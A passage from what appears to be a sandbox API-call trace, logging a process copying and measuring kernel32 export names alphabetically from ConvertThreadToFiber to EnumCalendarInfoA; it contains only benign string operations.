returned="ConvertThreadToFiber" [0071.182] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0071.182] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0071.182] lstrlenA (lpString="COPYCONTEXT") returned 11 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0071.182] lstrlenA (lpString="COPYFILEA") returned 9 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0071.182] lstrlenA (lpString="COPYFILEEXA") returned 11 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0071.182] lstrlenA (lpString="COPYFILEEXW") returned 11 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0071.182] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0071.182] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0071.182] lstrlenA (lpString="COPYFILEW") returned 9 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0071.182] lstrlenA (lpString="COPYLZFILE") returned 10 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0071.182] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0071.182] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0071.182] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0071.182] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0071.182] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0071.182] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0071.183] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0071.183] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0071.183] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0071.183] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0071.183] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0071.183] lstrlenA (lpString="CREATEEVENTA") returned 12 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0071.183] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0071.183] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0071.183] lstrlenA (lpString="CREATEEVENTW") returned 12 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0071.183] lstrlenA (lpString="CREATEFIBER") returned 11 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0071.183] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0071.183] lstrlenA (lpString="CREATEFILEA") returned 11 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0071.183] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0071.183] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0071.183] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0071.183] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0071.183] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0071.183] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0071.183] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0071.183] lstrlenA (lpString="CREATEFILEW") returned 11 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0071.184] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0071.184] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0071.184] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0071.184] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0071.184] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0071.184] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0071.184] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0071.184] lstrlenA (lpString="CREATEJOBSET") returned 12 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0071.184] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0071.184] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0071.184] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0071.184] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0071.184] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0071.184] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0071.184] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0071.184] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0071.184] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0071.184] lstrlenA (lpString="CREATEPIPE") returned 10 [0071.184] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0071.185] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0071.185] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0071.185] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0071.185] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0071.185] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0071.185] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0071.185] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0071.185] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0071.185] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0071.185] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0071.185] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0071.185] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0071.185] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0071.185] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0071.185] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0071.185] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0071.185] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0071.185] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0071.185] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0071.185] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0071.186] lstrlenA (lpString="CREATETHREAD") returned 12 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0071.186] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0071.186] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0071.186] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0071.186] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0071.186] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0071.186] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0071.186] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0071.186] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0071.186] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0071.186] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0071.186] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0071.186] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0071.186] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0071.186] lstrlenA (lpString="CTRLROUTINE") returned 11 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0071.186] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0071.186] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0071.186] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0071.186] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0071.187] lstrlenA (lpString="DEBUGBREAK") returned 10 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0071.187] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0071.187] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0071.187] lstrlenA (lpString="DECODEPOINTER") returned 13 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0071.187] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0071.187] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0071.187] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0071.187] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0071.187] lstrlenA (lpString="DELETEATOM") returned 10 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0071.187] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0071.187] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0071.187] lstrlenA (lpString="DELETEFIBER") returned 11 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0071.187] lstrlenA (lpString="DELETEFILEA") returned 11 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0071.187] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0071.187] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0071.187] lstrlenA (lpString="DELETEFILEW") returned 11 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0071.187] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0071.187] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0071.187] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0071.188] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0071.188] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0071.188] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0071.188] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0071.188] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0071.188] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0071.188] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0071.188] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0071.188] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0071.188] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0071.188] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0071.188] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0071.188] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0071.188] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0071.188] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0071.188] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0071.188] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0071.188] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0071.188] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0071.188] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0071.189] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0071.189] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0071.189] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0071.189] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0071.189] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0071.189] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0071.189] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0071.189] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 